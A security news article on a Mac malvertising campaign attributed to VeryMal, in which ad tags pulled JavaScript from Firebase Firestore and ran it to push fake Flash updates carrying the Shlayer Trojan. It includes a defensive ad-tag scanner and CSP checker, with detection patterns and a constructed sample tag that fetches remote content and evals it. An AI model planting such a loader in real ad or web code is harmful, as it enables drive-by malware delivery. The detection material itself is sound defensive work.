A new, large-scale Mac malvertising campaign was just discovered. Security researchers at Confiant say that approximately 1 million user sessions have been potentially exposed. The payload of the malvertising campaign is the Shlayer Trojan.
Who’s Behind the Mac Malvertising Campaign?
It’s believed that a group known as VeryMal is behind these Mac malvertising attacks. The group has been targeting Mac users, and it seems that it has just switched to a new malicious scenario. Previously, VeryMal criminals used steganography as an obfuscation technique. Now, the group is utilizing ad tags that retrieve a payload from Google Firebase with the purpose of redirecting users to malicious pop-ups, Confiant said.
What is Firebase? Firebase is a mobile and web application development platform developed by Firebase, Inc. in 2011, then acquired by Google in 2014. The platform is rich in features, and has a cloud-hosted backend suite which is typically used for mobile app development. One of the components abused by the attackers is Firestore, its document database, which has been leveraged from within the ad creative tags.
“The code in the tag actually does nothing more than request an entry from the attacker’s Firestore DB and then execute it as JavaScript using the eval() statement on line 27”, the researchers noted.
After first checking to see if it’s running in a desktop Safari environment, the code has a sub-condition that checks whether “navigator.javaEnabled()” has been tampered with in the current environment. If all checks out, the payload will redirect the unsuspecting visitor to the Flash prompt. The notable aspect, however, is that to most people and defense mechanisms the tag looks like a normal, innocuous ad tag.
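The tag logic described above (gate on desktop Safari and on navigator.javaEnabled(), request a Firestore document, hand it to eval()) is also the combination a defender can key on. What follows is an added example, not Confiant’s code and not anything from the campaign itself: a heuristic scan of an ad tag’s source for that combination, plus a check of whether a page’s Content-Security-Policy would refuse the eval() or the Firestore request. The sample tags, the hostnames, the indicator weights and the verdict thresholds are constructed assumptions for illustration.

```javascript
// Added example (not Confiant's code): two defender-side checks for the
// ad-tag pattern described above. (1) A heuristic static scan of an ad tag's
// source for "gate on browser fingerprint, fetch a remote document, eval() it".
// (2) A check of whether a page's Content-Security-Policy would have stopped
// such a tag. Weights, thresholds, hostnames and samples are constructed.

const INDICATORS = [
  // eval()/Function() turn fetched data into executable code
  { id: "dynamic-eval",      weight: 3, re: /\beval\s*\(|new\s+Function\s*\(/ },
  // the executable content comes from a network request, not from the tag itself
  { id: "remote-fetch",      weight: 2, re: /\bfetch\s*\(|XMLHttpRequest/ },
  // Firestore / Firebase endpoints (legitimate services, so low weight on their own)
  { id: "firebase-backend",  weight: 1, re: /firestore\.googleapis\.com|firebaseio\.com|\bfirebase\b/i },
  // environment gating on the browser, as the campaign did for desktop Safari
  { id: "ua-gating",         weight: 1, re: /navigator\.userAgent|\bSafari\b/ },
  // anti-analysis check on navigator.javaEnabled
  { id: "javaenabled-check", weight: 2, re: /navigator\.javaEnabled/ },
];

// Returns which indicators fired, a weighted score, and a verdict.
function scanAdTag(source) {
  const matched = INDICATORS.filter((i) => i.re.test(source));
  const hits = matched.map((i) => i.id);
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  let verdict = "allow";
  if (hits.includes("dynamic-eval") && hits.includes("remote-fetch")) {
    // executes whatever a server returns: never acceptable in an ad tag
    verdict = "block";
  } else if (score >= 3) {
    verdict = "review";
  }
  return { hits, score, verdict };
}

// Minimal CSP parser: "directive src src; directive src" -> { directive: [srcs] }
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// A CSP stops this kind of tag if eval() is refused (no 'unsafe-eval' in the
// effective script-src) or if the tag cannot reach its Firebase backend.
function cspStopsTag(header) {
  const d = parseCsp(header);
  const scriptSrc = d["script-src"] || d["default-src"];   // undefined => no restriction
  const connectSrc = d["connect-src"] || d["default-src"];
  const evalBlocked = scriptSrc !== undefined && !scriptSrc.includes("'unsafe-eval'");
  const fetchBlocked = connectSrc !== undefined && !connectSrc.some((s) =>
    s === "*" || s === "https:" || /googleapis\.com|firebase/i.test(s));
  return { evalBlocked, fetchBlocked, stopped: evalBlocked || fetchBlocked };
}

// Constructed sample with the shape the article describes (not the real tag);
// the project path is a placeholder.
const SUSPECT_TAG = [
  "(function () {",
  "  if (!/Safari/.test(navigator.userAgent)) return;",
  "  if (typeof navigator.javaEnabled !== 'function') return;",
  "  fetch('https://firestore.googleapis.com/v1/projects/PLACEHOLDER/databases/(default)/documents/t/1')",
  "    .then((r) => r.json())",
  "    .then((doc) => eval(doc.fields.js.stringValue));",
  "})();",
].join("\n");

// Constructed benign tracking pixel for comparison
const BENIGN_TAG = [
  "var img = document.createElement('img');",
  "img.src = 'https://ads.example.invalid/pixel.gif?slot=top';",
  "document.body.appendChild(img);",
].join("\n");

console.log(scanAdTag(SUSPECT_TAG));   // verdict: "block"
console.log(scanAdTag(BENIGN_TAG));    // verdict: "allow"
console.log(cspStopsTag("default-src 'self'; script-src 'self' https://cdn.example.invalid"));
```

The static scan is a triage aid, not a proof: a Firebase reference or a user-agent check on its own is ordinary ad-tech behaviour, which is why only the eval-of-fetched-content combination is an automatic block. The CSP check applies to the document in which the tag actually executes; a creative delivered inside a cross-origin ad iframe is governed by that frame’s own policy, not the publisher page’s, so the publisher’s header alone is no guarantee.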
Fortunately, Google has suspended the abused Firebase accounts, but researchers believe that cybercriminals will continue to leverage this technique.
As for the display-ad redirects, they are being deployed to deliver fake Flash updates to unsuspecting users. Once the potential victim interacts with the ad on a website, a pop-up appears prompting the user to update their Flash player. Upon agreeing to the prompt, the payload, the Shlayer Trojan, will be deployed.
More about the Shlayer Trojan
The Shlayer Trojan has been known for using fake Adobe Flash updates. A previous campaign used fake updates hosted on sites that masqueraded as legitimate ones, or on hijacked domains formerly hosting legitimate sites.
Malicious browser extensions have also been used by the Trojan. The dangerous code is disguised once again as an Adobe Flash Player installer.
Keep in mind that the Shlayer Mac Trojan can lead to further infections. Given its complex modular design, it can easily be used for other malicious purposes, such as the following:
Information Harvesting. The malware can be configured to harvest both machine metrics and user information. The first category is used to generate a unique ID that is assigned to each individual machine. This is done via an algorithm that uses a list of installed hardware components, user settings and other operating system metrics. It can also directly expose the identity of the victims by looking for strings that can reveal their name, address, phone number, location and any stored account credentials.
System Changes. To facilitate further infections the payload code can make various changes to the compromised machines — configuration files, operating system environment values and user settings.
Boot Options Modifications. By accessing the Mac OS computer’s settings, the Shlayer Trojan can set itself or the other deployed payloads to automatically start when the computer is powered on.
Additional Payload Delivery. The Trojan can be used to deliver other threats to the computers such as miners and ransomware.